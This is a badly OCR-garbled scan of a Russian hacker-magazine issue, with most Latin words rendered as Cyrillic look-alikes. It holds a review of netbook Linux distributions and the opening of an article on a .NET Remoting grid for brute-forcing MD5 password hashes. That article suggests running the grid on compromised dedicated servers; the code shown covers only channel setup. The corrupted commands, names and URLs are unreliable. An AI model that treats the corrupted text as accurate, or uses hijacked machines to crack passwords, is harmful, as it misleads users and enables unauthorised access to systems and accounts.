Для начала стоит определиться — какие отли- 
чительные черты у дистрибутива для нетбука? 



Ведь на нетбук можно поставить совершенно 
любой х86-дистрибутив — если много свобод- 
ного времени, то можно и Сепіоо на Аіот'е 
пособирать. Выделим основные параметры, 
отличающие дистрибутивы для нетбуков от 
дистрибутивов «общего назначения»: 

• Интерфейс, заточенный под небольшие 
экраны. Если на экране от 10" со стандартным 
интерфейсом Опоте/КОЕ еще как-то можно 
жить, то на 7" стандартный интерфейс уже 
никуда не годится. 



► 090 



ХАКЕР 04 /135/ 10 







о 



Соо^Іе 



Т " ' бтаіі - Входящие - асіе.. 



ІЛ игкіег «Іеѵеіортепі. Ое$і§п& аге &иЬ|есі іо сНапге . 






н 

СтаіІ 





ѴоиТиЬе РІса&аѴѴеЬ 



и 

Ниіи 



ога 



иіа 



р 

РапсІога 



Сотасіі 






СаІеиІасог 



& 

То-сЬ 




ѣ 

Воокь 




ТѵѵіМег 






Списокзакладок-приложений СЬготіипп 05 



• Оптимизация под типовое железо нетбуков 
позволяет добиться небольшого прироста про- 
изводительности. 

• Как правило, предпочтение отдается более 
«легким» компонентам — можно уснуть, пока 
запустится стандартный ОрепОЛісе :). 

Да, конечно, любой дистрибутив можно опти- 
мизировать, выкинуть все лишнее, пересоб- 
рать ядро — но оно тебе надо, если за тебя это 
уже сделали другие? Итак, сегодня на ринге: 

• ІІЬипІи МеіЬоок Ретіх — респин самого 
популярного дистрибутива; 



• МоЫіп І_іпих — в прошлом разработка компа- 
нии Іпіеі, с начала 2009 разрабатывается Ыпих 
РоипбаОоп; 

• Зоодіе СЬготе ОБ — еще незарелизенная, 
ноуже нашумевшая ОС отбоодіе; 

• Доіісіоисі — ОС с«облачными»замашками. 

ТРЕНИРОВОЧНАЯ 

ПЛОЩАДКА 

Как полигон для тестирования я использовал 
І_епоѵо ібеараб зі 0-2 с типичными для своего 
поколения нетбуков характеристиками: 



•Экран: 10.1 ",1024x600; 

• Процессор: ІпІеІАІот N270 1.6 ГГц; 

• Видео: Іпіеі 6МА950; 

• ОЗУ: 1 Гб: 

• Винт: 160 Гб; 

• Сеть: 1 0/1 00 Мбит/с ЕІНегпеІ. 802.1 1 Ь/д, ѴѴіМАХ. 

Забегая вперед, скажу, что благодаря «ти- 
пичности» компонентов удалось избежать 
проблем сдрайверами — почти во всехдист- 
рибутивах все работало «из коробки». 

В АФРИКЕ ГОРЫ 
ВОПАКОЙ ВЫШИНЫ... 

ІІЬипІи ІЧеіЬоок Ретіх (ІІІЧВ) — один из 
вариантов ІІЬипІи для нетбуков отСапопісаІ 
(будущее второго варианта, ІІЬипіи с интер- 
фейсом МоЫіп, пока туманно]. От стандартной 
ІІЬипіи отличается нетбуко-ориентированным 
интерфейсом, оптимизацией для работы на 
нетбучном железе, а также немного другим на- 
бором приложений. С версии 10.04 в стандар- 
тной поставке отсутствуют та кие тяжелые для 
нетбука приложения, как Оітр и ТотЬоу. 
Кстати, о железе. Минимальные системные 
требования весьма демократичны: любой Іпіеі 
Аіот, 512 ОЗУ и 4 Гб свободного места — то 
есть, теоретически, подойдет любой нетбук. 

На вики-страничке списокпротестированных 
нетбуков разделен на 3 категории: подде- 
рживаемые, поддерживаемые с небольшими 



М0ВШИѴІРТІМІ.В0Х 



Если под рукой нет необходимого железа, а посмотреть на МоЫіп очень хочется, то можно 
запуститьего в ѴігІиаІВох. Но для этого надо немного сплясать с бубном: 

1. Переименовать скачанный софсайта образ из ітд в ізо. 

2. Создать виртуальную машину, в настройках включить ІО АРІС и РАЕ/ІЧХ. Подключить полу- 
чившийся образ диска и создать новый виртуальный винт. 

3. Загрузившисьс образа диска, установить МоЫіп (В Еіѵе-режиме можно не пробовать — 
скорее всего, не запустится]. 

4. При загрузке установленной системы нажать <Е1 > — покажется меню СНОВ. Отредактиро- 
вать строку запуска, убрать параметры диіеі и ѵда=си ггепі, вместо них добавить параметр 3, 
запускающий третий гипіеѵеі. 

5. После загрузки отредактировать файл /еСс/іпіЦСаЬ, в самом конце которого заменить 
строку /изг/зЬіп/шоЫіп-(±п на /изг/Ьіп/зСагСх. 

НіпЕ На МоЫіп 2.1 лучше не ставить «Дополнения гостевой ОС» от Ѵі гі и а I В ох 3 . 1 — все слома- 
ется :). 
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МоЫіп — это не столько дистрибутив, сколько графическая среда, которую можно устано- 
вить на любимый дистрибутив. 

ІІЬипІи: 

В стандартные репозитории МоЫіп не входит. Но есть рра [ Ыіірз ://1а и псЬ расі . 
пеі:/~тоЫ.іп/+агсЬіѵе/рра ]. Правда, этот рра не официальный и с высокой степенью веро- 
ятности могут возникнуть проблемы с зависимостями. 

БеЬіап: 

МоЫіп присутствует в Іезбпд и ипзТаЫе. Метапакета (каки пункта віазкзеі] пока нет, поэто- 
му придется ставить компоненты отдельно. После добавления репозитария ставится так: 

# арД-деД іпзДаІІ дДк2 -епдіпез-шоЫіп шоЫіп-сигзог-Ытеше гпоЫіп- 
ісоп-Дкете шоЫіп-зоипсі-Ыіеше шоЫіп-гпепиз тоЫіп-рапеі-аррІісаДіопз 
шоЫіп-рапеІ-гпесііа шоЫіп-рапеІ-гпузопе тоЪііп-рапеі-разДеЪоагсІ 
шоЫіп-рапеІ-реорІе шоЫіп-рапеІ-зДаДиз шоЫіп-зеззіоп тиДДег-тоЫіп 
Ресіога: 

# ушп дгоиріпзДаІІ "МоЫіп ЭезкДор ЕпѵігоптепД " 

Мапсіпѵа: 

# игрші Дазк-тоЫіп 

ОрепБІІБЕ: 

На момент написания статьи репозиторий с МоЫіп 2.1 для ОрепБІІБЕ 1 1 .2 еще находился 
в разработке. 



оговорками и плохо поддерживаемые. Первая 
категория содержит42 модели (в том числе и 
мой подопытный], вторая — 1 5, третья — всего 
4 (это нетбуки либо на базе ѴІА, либо с графикой 
Іпіеі ѲМА500]. Да ито, проблемы сэтими 4 
моделями легко решаются с помощью специ- 
ализированных скриптов, дополнительных 
репозиториев и большого соттипііу :]. 
Последняя, на момент написания статьи, 
версия — 9.10. В апреле 2010, одновременно 
с релизом обычной ЮЬиЫи, должна выйти 
версия 1 0.04. 

Интерфейс, выполненный в стиле ОЬиЫи, 
интуитивно понятен. Его представление скла- 
дывается из следующих компонентов: 

• Апплет«ОезкІор БѵѵіІсЬег», позволяющий 
переключаться между обычным Опоте'овским 
интерфейсом и интерфейсом ЫеТЬоок Ветіх. 

• ІІМР І_аипсЬег — заменяет стандартное меню 
Опоте. Отображает категории приложений в 
виде плоского вертикального списка вместо 
выпадающего меню. Содержит также катего- 
рию «Избранное» (ЕаѵогіТез), куда пользова- 
телем добавляются приложения для быстрого 
запуска. 



• Апплет«6о Ноте» — при клике произойдет 
переключение на «рабочий стол» — главное 
меню ІЛЧВ ЬаипсЬег. Если перетащить на 
апплет файл или приложение, то ссылка на 
него появится в категории «Избранное» ІІІЧВ 
ЬаипсЬег. 

• Апплет«ѴѴіпсіоѵѵ Ріскег» — апплет панели 
Опоте, отображающий открытые окна, как 
иконки на панели. Из развернутого на полный 
экран окна убирает за головок, а название 
окна и кнопкузакрытия помещаетна верхней 
панели. 

• Демон Махітиз — автоматически разворачи- 
ваетна полныйэкран и унифицирует внешний 
вид всех окон. Поддерживаетсписки исклю- 
чений. 

ЮМЕ — пожалуй, самая «клонируемая» ОС для не- 
тбуков, на базе нее создано и развивается наиболь- 
шее число «клонов». Самые известные из них: 

• Еазуреазу — по сути, ІЛ\ІВ с несколько другим 
набором прикладного ПО (вт.ч. проприетарно- 
го: Бкуре, драйвера, кодеки], пересобранным 
оптимизированным ядром и оформлением. 
Последняя на момент написания статьи версия 
— 1.5, основана на базе ЮЬиЫи 9.04. 



> Соодіе * 




Нет, это не скриншот браузера — 
это интерфейс СЬготіит 05 

• ЕееЬипІи МБР — респин ЮМЕ, нацеленный на 
поддержку нетбуков Азиз Еее РС (хотя другие 
нетбуки тоже работают]. Имеетоптимизирован- 
ное ядро и несколько другой набор приклад- 
ного ПО. Кроме ІЧВП (ІМеТЬоок Петіх], есть 
варианты Біапсіаіі: (с рабочим столом Опоте], 
Вазе (с урезанным в целях экономии места 
набором ПО] и ЕХОЕ (соответственно, с ЬХОЕ в 
качестве рабочего стола]. Последняя на момент 
написания статьи версия — 3, основана на базе 
ЮЬиЫи 9.04. Версия 4 будет на базе ОеЬіап 
ІІпзТаЫе. 

• І_ееепих — основанная на Еазуреазу сборка, 
лишенная несвободных компонентов. Оптими- 
зирована для работы на 7" экранах (Азиз Еее 
РС 701], вустановленном виде занимает всего 

1 ,2 Гб. 31 января вышла версия 2.0 (основана 
на Еазуреазу 1 .5), в марте должна выйти версия 
3.0, которая уже будет базироваться на ІЛЧВ 
9.10. 

ыыихгокштЕі. 

МоЫіп — созданный ІЫеІ (впоследствии 
перешедший под крыло Ьіпих Рои псіаііоп) 
дистрибутив для нетбуков и МЮ на базе 
I пііеі Аіот. Имеет специализированный 
интерфейс на базе ОІЧОМЕ МоЬіІе и биб- 
лиотеки СІиІТег (активно использующей 
видеокарту для отрисовки интерфейса]. 
Последняя на момент написания статьи 
версия — 2.1, каких-либо сведений относи- 
тельно сроков выхода нового релиза пока 
нет. Минимальные системные требования 
достаточно жесткие: процессор I піе I с под- 
держкой 555ЕЗ (АТот или Соге 2, процессо- 
ры без 555ЕЗ не поддерживаются], видео- 
карта ІЫеІ (ІЧѵісІіа, АМО и даже I піе I 6МА500 
не поддерживаются]. В списке совмести- 
мых находятся всего лишь 17 нетбуков и 
5 неттопов. Причем, в 5 поддерживаемых 
нетбуках не работает беспроводная сеть 
(если беспроводной чип не от Іпіеі — тебе 
не повезло]. В принципе, такая политика 
корпорации-гиганта понятна. Теперь, когда 
дистрибутив перешел под попечительство 
Ьіпих Еои псіаііоп , список совместимых 
устройств должен расшириться. 
Распространяется МоЫіп довольно логичным 
для нетбуков способом — с помощью специ- 
ального образа, который при помощи сИ или 
нехитрого скрипта на питоне заливается на 
флешку. 



УСТАНОВКА ПО В СНРОМШМ 03 



Так как на данном этапе своего развития СЬготе 05 (точнее, СЬготіит 05] основана на 
ІЭЬиЫи 9. 10, то установитьдополнительные приложения можно следующим образом: 

1. Переходим втерминал: <С1т1+Аи+Т> 

2. Создаем необходимые каталоги: 

$ зиОо тксііг -р /ѵаг/саске/арД /агскіѵез/рагДіаІ 
$ зиОо тксііг -р /ѵаг/Іод/арД 

3. Перемонтируем корень в гѵѵ: 

$ зиОо тоипД -о гетоипД , гѵ? / 

4 . Создаем зоигсезТізД 

$ есію "ОеЪ ДШДр : //тіггог .уапОех. ги/иЪипДи кагтіс таіп гезДгісДес!" I \ 
зисіо Дее -а /еДс/арД/зоигсез . ІізД 

5 . Получаем список пакетов: 

$ зиОо арД-деД ирОаДе 



► 092 
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Главная фишка МоЫіп'а — впечатляющий интерфейс, 
реализующий модный нынчетрендзадаче-ориентирован- 
ности. Интересна также интеграция социальными сетями 
(правда, не особо у нас популярными — Ілл/іНег и ІазЕІт]. 
Меню состоитиз 12страниц: 

• Му2опе — открывается по умолчанию, содержит кален- 
дарь, приветствие и ленту активности друзей в социальных 
сетях; 

• Біаіиз — текущий статус во всех настроенных социальных 
сетях; 

• Реоріе — друзья в социальных сетях со статусом «Он- 
лайн»; 

• Іпіегпе* — браузер, Рі гебох 3.5. Флеш-плагин установлен 
поумолчанию; 

• Месііа — под одной вкладкой скрываются аудио/видеоп- 
леер и просмотрщик картинок. Все медиа-файлы собраны в 
одну коллекцию; 

• РазІеЬоагсІ — продвинутый буфер обмена; 

• Арріісаііопз — списокустановленных приложений (по 
категориям] и различные настройки; 

• 2опез — текущие открытые окна (вызывается по 
< Аи+Та Ь >] ; 

• Последние 4 страницы — показательуровня заряда бата- 
реи, настройки звука, ВІиеГооІіЬ и подключения ксети. 
Несмотря на номер версии, МоЫіп скорее напоминает 
раннюю альфа-версию, чем релиз. Из минусов, что я успел 
заметить: 

• В системе отсутствует поддержка ех{4, хотя используется 
ядро 2.6.31 ; 

• «Местная» ВІЛ-программа для управления сетевыми 
соединениями (Сопптап) обладает весьма скромными 
возможностями — на пример, не позволяет присвоить ин- 
терфейсу произвольный ІР-адрес (только ОНСР); 

• Для кого-то может показаться минусом весьма условная 
русификация; 

• Проблемы с воспроизведением аудио/видео в закрытых 
форматах — в репозитории попросту нет кодеков; 

• Вообще репозитории пока достаточно бедные. Там даже 
нет тс! :] 



Интербейс ЦЬипШ ЫеіЬоок Кетіх 




І_оаіп-5сгееп Сйготіит 05 Іего 



ВЫ ПО НЕБУ ПРОКАТИТЕ 
НАС, ОБЛАКА 

Следующий претендент — нашумевшая ОС от великой 
и ужасной Соодіе. Хотя официального релиза еще нет, 
наличие исходных текстов (проект СЬготіит 05 — ѵѵѵѵѵѵ. 
сбготіит.огд/сЬготіит-оз ] породило кучу разнообразных 
любительскихсборок — отобразов для виртуальных машин 
до вполне себе полноценных І_іѵе С0/СІ5В. Для тестов я 
использовал ЫѵеІІЗВ СЬготіит 05 2его ( ШрТ/сЬготеоз. 
Ьеххеб.пеі: ). 

Для тех, кто вдруг с год не был в инете и не в курсе, сообщу, 
что СЬготе 05 — это ОС отОоодІе с интегрированным брау- 
зером отОоодІе с интегрированными сервисами отОоодІе. 
ОС — браузер. Хочешьтекстовый редактор? Пожалуйста! 
Ооодіе Оосз. Почтовый клиент? боодіе Маіі! ІМ-клиент? 
ОоодІеТаІк! Итакдалее... В ОС есть только браузер, установ- 
ка других приложений даже не предусмотрена (но возможна 
— ведь в основе СЬгот іи т 05 обычная ІІЬипІи)! 




1 ііТро I I 

> іпіо 

• МЮ (МоЬіІе I пТегпеТ 
Оеѵісе] — компактный 
компьютер (размер 
диагонали экрана со- 
ставляет 4-7 дюймов), 
предназначенный, 

в первую очередь, 
для просмотра веб- 
страниц и работы 
с веб-сервисами. 

• 555ЕЗ 
(Бирріетепіаі 
5ігеатіпд 51 М О 
Ехіепзіоп 3] — это 
обозначение, данное 
I піеі’ом четверто- 
му расширению 
системы команд. По 
сравнению с 55ЕЗ, 
добавлено 32 новых 
уникальных команды, 
работающих супако- 
ванными целыми. 

• Стоит отметить, 
грузится СЬготіит 
05 действительно 
быстро, субъективно 
быстрее конкурентов. 

• По заверениям 
Ооодіе, первые 
нетбуки с предуста- 
новленной СЬготе 
05 (которая может 
работать как на 
х86, так и на АВМ 
архитектуре] должны 
появиться в о второй 
половине 2010. 
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Очередной сюрприз от МоЫіп 



Какие плюсы имеет пользователь оттакой 
«облачности» ОС: 

• Все данные хранятся у Ооодіе — ничего не 
потеряется и доступно с любого компьютера. 

• Скорость и нетребовательность к ресурсам. 
СЬготіит 05 содержит в себе очень много 
оптимизаций — Соодіе обещает, что к моменту 
релиза время загрузки достигнет 7 секунд. 

• Безопасность — фактически, на клиентском 
компьютере остается всего одно потенциально 
уязвимое клиентское приложение — браузер. В 
СЬготе 05 обновления будут уста на вливаться 
автоматически, без каких-либо действий со 
стороны пользователя. 



• Простота — пользователю не надо возиться с 
установкой/удалением/обновлением приложе- 
ний — все уже сделано за него. 

Самый же большой минус (если не обращать 
внимания на разные параноидальные мысли 
:]] — это тотальная зависимость от инета (при- 
чем, достаточно скоростного), а он на просторах 
нашей необъятной Родины за пределами МКАД 
есть далеко не везде и не всегда безлимит. 
Загрузившись, ОС попросит ввести логин/ 
пароль. Здесь нужно вводить данные от 
своего Соодіе-аккаунта (если такого, вдруг, 
нет — самоевремяего завести). После 
успешного входа в систему ОС запустит 




браузер (естественно, Соодіе СЬготе] и 
откроет вкладку с Соодіе Маіі. В левом углу 
браузера будетлоготип СЬготе — это стра- 
ница с закладками (они же — приложения в 
местной философии). В правом верхнем углу 
будет пиктограмма для настройки браузера, 
пиктограмма для отображения текущего 
заряда батареи и простенький менеджер 
настройки сети. Собственно, это все, больше 
ничего нет — даже для того, чтобы сделать 
скриншот, надо устанавливать расширение 
для браузера :). Поумолчанию в СЬготіит 
05 1 9 закладок: как ни странно, в списке не 
только сервисы от Соодіе — есть, например 
Ѵабоо! Маіі и даже Ноітаіі. 

В новом менеджере окон (или, точнее, ме- 
неджере вкладок) есть хоткеи на все случаи 
жизни. Достаточно нажать <Р8>, чтобы увидеть 
интерактивный хелп по хоткеям. Если хочется 
посмотреть, что у новой ОС «под капотом»: 
нажми <СМ+АІ1:+Т> — здравствуй, родной 
терминал! 

К сожалению, поддержка железа у СЬготіит 
05 пока хромает — это единственный дистрибу- 
тив, в котором на тестовом нетбуке не завелась 
беспроводная сеть (ядро у него свое, не от 
ІЛэипІи]. На ѵѵікі -странице всего 1 5 полностью 
поддерживаемых нетбуков. 

В целом, по-моему, очень интересный концепт, 
взгляд Соодіе на то, как будет функциониро- 
вать ОС будущего. И хотя «облачная» замена 
пока есть далеко не для всех приложений 
(например, что если пользователю понадобит- 
ся САБ-система или более-менее серьезный 
графический редактор?) — на нетбукахтакая 
схема вполне может прижиться. 



Интерфейс МоЫіп 



11:41 рт 

РеЬгиа*"Ѵ 1,2010 



Арроіпітепіз 

N 0 сэіепгіаг етгіеа йі« ѵѵеек 

ЫоіЫпе ш сіо сосіау 





ѴѴекоте іо МоЫіп 2,1 ^ог 
ІМеіЬоокз 

Аз МоЫіп Іа а Ыі сШегет іо оібег сот ршегз, 
ѵѵеѴе рш Ео^еЕбег а соиріе оГ Ыіз аЫ ріесез ео 
И еір уои ПпсІ уоиг ѵщ агоипЬ. ѴѴе боре уои егцоу 
Іі, ТЪе МоЫіп Теапъ 



ТЫп§5 гбагуоиг кіепгіз гіо опііпе ѵѵіІІ арреаг 
беге, АсЕгѵаЕе уоиг ассоипі* поѵѵ! 
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МЕЖДУ НЕБОМ И ЗЕМЛЕЙ 

Видимо, идея поместить ОС в облако не даетспать нетоль- 
ко ребятам из Ооодіе. Молодая французская компания тоже 
решила сделать свою «облачную» ОС. Им даже каким-то 
образом удалось получить на разработку $4.2 млн в рамках 
венчурного финансирования. Взяли немного ІІЬипІи, 
добавили чуть-чуть ОеЬіап и собственных облачно-ориен- 
тированных разработок— получилась ОС боИСІоисІ, что-то 
среднее между ІІЬипІи ЫеШоок Петіх и СЬготіит 05. Тоже, 
вроде бы, с«облачной» начинкой, но не полностью интер- 
нет-зависима, какОС отОоодІе. 

Установить ОС можно двумя способами: 

• С обычного 150-образа (который также и ЫѵеСО). В плане 
установки .МіСІоисІ ничем, крометемного оформления, не 
отличается от ІІЬипІи. 

• Используя инсталлятор под ѴѴіпсІоѵѵз (поддерживаются ХР 
и 7]. Инсталлятор не будет менять существующую таблицу 
разделов, а просто установит ОС в большой файл на указан- 
ном разделе. Потом через «Установку/удаление программ» 
ОС можно будетудалить. Идеально для новичков! 
Дистрибутив может похвастаться широкой поддержкой обо- 
рудования («из коробки» работают даже Іпіеі ОМА500 и ѴІА 
С7М]. На офсайте написано, что ОоІіСІоисІ работает на 98% 
всех нетбуков. На страничке поддерживаемого оборудова- 
ния 75 поддерживаемых нетбуков/неттопов, 7 «частично 
поддерживаемых» и всего 3 неподдерживаемых. 98%. .. 
похоже на правду :). Тестовый нетбук опять же оказался в 
списке полностью совместимых. 

После установки ОС предложит создатьспециальный 
3 о Іі С Іо и б -аккаунт. Что он дает: 

• Возможность устанавливать и удалять приложения одним 
кликом мышки. Список приложений весьма обширен и 
включает в себя нетолько нативные линуксовые приложе- 
ния, но и ѴѴеЬ-приложения через Могіііа Ргізт. 

• Возможность синхронизации списка установленных 
приложений на всех нетбукахс помощью одного боІіСІоиб- 
аккаунта. Данная функция находится в разработке и пока 
недоступна простым пользователям. 

• Возможность общаться с другими пользователями 
боІіСІоисІ (что-то вроде своей маленькой социальной сети] и 
видеть, какие приложения устанавливаюттвои друзья. 

• Возможность держать часть файлов в онлайн-хранилище, 
а также синхронизировать их между нетбуками (заявленная 
разработчиками, но еще не реализованная функция]. 

Кроме, собственно, самого б оІіСІоиб -аккаунта, дистрибутив 
имеет следующие отличия отШЧП: 

• Пересобранное оптимизированное ядро с дополнитель- 
ными драйверами; 
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Интерфейс Доіісіоисі. Единственный след «облачности» — пик- 
то грамм ка в правом верх нем УГЛУ 



• Поддержка РІазЬ и Оеагз в РігеРох; 

• Предустановленные кодеки. 

Общая стабильность работы ОС оста вляетжелать лучшего 
— у меня дистрибутив пару раз намертвозавис. Ноэто мож- 
но списать на активное развитие — последняя, на момент 
написания статьи, версия — РгеВеІа (0.3]. 

МУКИ ВЫБОРА 

В статье представлены 4 дистрибутива, хотя и позициониру- 
ющие себя в одной нише, но, по сути и идеологии — совер- 
шенно разные. 

ІІЬипІи МеіЬоок Ретіх — всем знакомая ІІЬипІи, яркий 
представитель ОС «дооблачного» периода (если не считать 
худо-бедно-иногда работающий ІІЬипіи Опе]. Один раз 
настроенный, нетребует постоянного подключения к инету. 
Широко распространена, можно найти ответ практически 
на любой вопрос. 

МоЫіп — пока больше похож на концепте интересным ин- 
терфейсом, ориентированный на постоянное подключение 
к инету. Из-за малой распространенности ответы на воп- 
росы лучше искать в списке рассылки разработчиков или 
в ІРС. Если понравился интерфейс, то рекомендую именно 
его установить на любимый дистрибутив (см. врезку«МоЫіп 
в твоем дистрибутиве»]. 

Ооодіе СЬготе (СЬготіит) — по всей видимости, ОС с 
высоким потенциалом. Все приложения и данные находят- 
ся в «облаке» и доступны только при подключенном инете. 
Поддержку лучше искать в Ооодіе Огоирз (сбготіит-оз-*] 
или I РС. Думаю, эта ОС имеет все шансы скоро быть предус- 
тановленной на значительной части нетбуков, 
боіісіоисі — «полуоблачный» дистрибутив. Для работы 
постоянное подключение к инету не обязательно, хотя 
и желательно. Отличная поддержка железа, установка 
приложений в один клик, предустановленные кодеки, 
инсталляция из под ѴѴіпсІоѵѵз — в общем, можно уверен- 
но рекомендовать эту ОС Ріпих-новичкам. Поддержку 
можно найти на форуме ( ѵѵѵѵмТесЬгеѵіеѵѵопІ-іпеІюгит. 
сот/] о Ц с Іо и б -Іо гит -И 7.Нті 1. есть группа в РасеЬоок 
(более 5000 участников] и Іѵѵіііег ( ЬирѴЛѵѵіиег.сот/ 
щіісіоисі ]. 

Как всегда в мире Ріпих — выбор есть, ц-ц 
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• Официальные сай- 
ты Дистрибутивов: 
ѵѵѵѵѵѵ.иЬипІи.сот 
тоЫіп.огд 
ѵѵѵѵѵѵ.сЬготіит.огд 
ѵѵѵѵѵѵдоіісіоиб.сот 



• Сравнение про- 
изводительности 
рассматриваемых 
ДИСТрибуТИВОВ: 

ѵѵѵѵѵѵ.рЬогопіх.сот/ 
5сап.рбр?раде= 
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сбготіит тоЫіп 
Ьепсбтагкз 
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.МЕТ РЕМ0ТШ6: ПРОГРАММИМ СИСТЕМЫ 
РАСПРЕДЕЛЕННЫХ 6КШ-ВЫЧИСЛЕНИИ 




При правильном подходе к распределению трудоемкой задачи между 
имеющимися вычислительными мощностями экономятся время 
(деньги), ресурсы, а для кого-то и нервные клетки. Именно для этого 
предназначена система распределенных вычислений, созданием 
и организацией которой мы займемся в этой статье. 



С ети распределенных вычислений 
впервые нашли свое применение в 
науке. Моделирование сложных про- 
цессов, обработка большого объема 
данных и тому подобные задачи 
требуют вычислительных мощностей, которые 
зачастую не способны предоставить суперком- 
пьютеры. При этом здесь мы не затрагиваем 
финансовую составляющую. Как альтернативу 
огромным вычислительным комплексам уче- 
ные решили взять «с миру по нитке», и сейчас 
мы можем наблюдать продукты их побочной 
деятельности: начиная от обычных кластеров 
и заканчивая ботнетами, которые, в подавляю- 
щем большинстве случаев, используются в 
корыстных целях. Но тема бот-сетей в нашем 
журнале была раскрыта неоднократно, как в 
виде конкретных примеров работающих ботов, 
так и в виде концептов. Наша задача — рас- 
смотреть «светлую» сторону систем распреде- 
ленных вычислений, при этом абстрагируясь 
от типа решаемой задачи (будь то поиск вне- 
земных цивилизаций, лекарства от эпидемии 
нового вируса или хэша от «неприступной» 
комбинации символов). По этой причине мы 
не будем скрывать клиентскую часть нашей 
системы на компьютерах пользователей. 
Антивирусы и файрволы мы обходить также не 
планируем, что, тем не менее, не приведет к 
упрощению нашей задачи. 



ЗАКЛАДЫВАЕМ ФУНДАМЕНТ 

Традиционно, прежде чем приступить к кодин- 
гу, необходимо ознакомиться с теоретической 
частью вопроса. В нашем случае теория проста 
до безобразия. Что, к сожалению, не мешает 
ей скрывать некоторые подводные камни. Обо 
всем по порядку. 

Грид-вычисления (от англ, «дгіб» — сеть, 
решетка) — форма распределенных вычисле- 
ний, в которой группа компьютеров, объединен- 
ных каналами связи (кластер), выполняет боль- 
шой объем работ. В свою очередь, сеть этих 
компьютеров называется «грид». Данный тип 
сетей в настоящее время нашел свое примене- 
ние в коммерческой инфраструктуре для реше- 
ния таких трудоёмких задач, как экономическое 
прогнозирование, сейсмоанализ, разработка и 
изучение свойств новых лекарств. Спускаясь с 
облаков на землю, скажу, что и хакеры данной 
технологии находят множество применений. 

Ни для кого не секрет, что современные систе- 
мы авторизации (например, встроенные в 
операционную систему или находящиеся на 
сайте) хранят пароли пользователей в виде так 
называемых «хешей» — строк фиксированной 
длины, соответствующих паролю. При осущест- 
влении авторизации переданная комбинация 
символов отображается в хеш и сверяется с 
хешем, хранящимся в базе системы. Хранение 
паролей в виде хешей отчасти гарантирует их 



бесполезность в руках хакера, получившего 
доступ к базе. Ему ничего не остается, кроме 
как «в лоб» перебирать все возможные комби- 
нации символов и сверять их хэши с целевым, 
то есть, искать коллизию. При высокой «стой- 
кости» пароля, то есть при сложной (с матема- 
тической точки зрения) комбинации символов, 
шанс подобрать заветную комбинацию симво- 
лов за актуальное время стремится к нулю. По 
крайней мере, на одном компьютере ;]. А если 
распределять задачу на несколько машин, то 
время перебора будет сокращаться пропор- 
ционально количеству рабочих станций. Самое 
время вспомнить о завалявшихся дедиках 
(бебісаіюсі зегѵегз) из прошлогодней коллекции 
;). В качестве типа хешей, который мы будем 
«потрошить», выберем М05, в силу его рас- 
пространенности в веб-инфраструктуре, но хочу 
напомнить, что нам важна не задача, а важен 
процесс ее выполнения. А теперь приступим к 
выбору инструмента. 

ЗАЧЕМ СКАЛЬПЕЛЬ? ТАЩИ КРАН! 

В нашем журнале неоднократно рассказыва- 
лось о прелестях программирования под плат- 
форму МісгозоЛ .ЫЕТ на разработанном специ- 
ально для нее языке С#. С нововведениями М5 
программирование все больше стало напоми- 
нать процесс сбора конструктора, а справочник 
М50Ы — отличной инструкцией к его сборке. 
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В качестве инструмента для разработки программного 
обеспечения относительно больших масштабов и распре- 
деленной архитектуры, .ЫЕТ окажется как нельзя кстати. 
Причина — не только в скорости разработки приложений и 
внесения изменений в код, относительной мультиплатфор- 
менности и простоте создания сервисов и «облачного» ПО. 
Помимо всего перечисленного, в рамках .ЫЕТ специалисты 
Майкрософт разработали множество мелких технологий, 
полезность которых осознаешь непосредственно в боевых 
условиях. Мы рассмотрим одну из таких технологий, полу- 
чившую название .ЫЕТ Ретобпд. Очень удивил тот факт, 
что в огромном количестве клиент-серверных приложений, 
написанных на С#, до сих пор используются сокеты, полез- 
ность которых заметна в специфичном программном обе- 
спечении, ориентированном на работу с сетью (сниферы, 
анализаторы пакетов, работа с портами и т.п.). Ремоутинг, в 
свою очередь, освобождает программиста от возни с соке- 
тами, открывая широкие возможности для организации рас- 
пределенной вычислительной среды. 

НТО НАМ СТОИТ ГРИД ПОСТРОИТЬ? 

Для начала, разберемся в устройстве сети, посмотрев на 
соответствующую картинку («Структура грид-сети»]. 

Система имеет в основе клиент-серверную архитектуру с, 
так называемым, «толстым» клиентом — то есть, клиентская 
часть берет на себя все необходимые данные для расчетов у 
сервера и затем обращается к нему только с определенным 
результатом. Задача сервера: корректно обработать запросы 
клиентов и синхронизировать имеющиеся данные между 
ними, при этом правильно выводя результаты администра- 
тору сети. То есть, нам. Тем, кто уже приступил к созданию 
сокета и формированию пакета для отправки, я с радостью 
продемонстрирую технологию .ЫЕТ ВетоОпд в действии. 

При первом запуске серверной части систему требуется 
создать и зарегистрировать канал на определенном порту 
(в качестве примера используем порте номером 39993], 
а также зарегистрировать класс для удаленной активиза- 
ции, то есть — для предоставления этого класса клиентам. 

В этом как раз заключается суть «Ремоутинга»: клиент 
создает у себя экземпляр класса, который расположен на 
удаленном сервере, и работает с этим экземпляром, как со 
своим. Особо внимательный читатель заметит, что это, по 
своей сути, сервис: серверная часть может предоставлять 
вычислительные ресурсы своим клиентам, а те, в свою оче- 
редь, получают лишь результаты расчетов. В нашем случае 
все происходит с точностью до наоборот: сервер должен 
использовать результаты работы клиентов. Разработчики 
Місгозоіі: таким образом стерли грань между клиентской 
и серверной частями: любой объект становится общедо- 
ступным и методы, принадлежащие ему, могут выполняться 
на любой из сторон. Применительно к нашему случаю: все 



вычисления, которые осуществляются в объектах клас- 
са, выполняются на сервере, а клиенту передаются лишь 
результаты этих расчетов. Вся эта система работает через 
прозрачный, невидимый для программиста, прокси-сервер. 

Создание удаленного (гетоііпд) класса 
на сервере 

//создать и зарегистрировать канал на порту 
39993 

ТсрЗегѵегСйаппеІ с!таппе1=пеѵт 
ТсрЗегѵегСйаппеІ (39993) ; 

СйаппеІЗегѵісез . КедізСегСЬаппеІ (ейаппеі) ; 
//зарегистрировать класс для удаленной 
активизации 
КетоЦіпдСопЕідигаЦіоп . 
КедізСегМеІІКпоѵтЗегѵісеТуре ( 

СуреоЕ (ВоС ) ,/ /регистрируемый класс 
" ВоС " , / /ІШІ регистрируемого класса 

/ /режим активизации для каждого 
клиентского вызова 
Ѵ/еІІКпоѵтОЬзесВМосІе . ЗіпдІеСаІІ) ; 

ІІРІ, он же ІІпііюгпп Везоигсе Ібепііііег (унифицированный 
идентификатор ресурса] — параметр, который используется 
клиентом для активизации объекта: с помощью ЦІ РІ клиент 
укажет серверу, что требуется экземпляр класса Воі. 

Клиент, в свою очередь, должен создать клиентский канал и 
зарегистрировать удаленный класс в локальном домене: 

//создать и зарегистрировать клиентский 
канал 

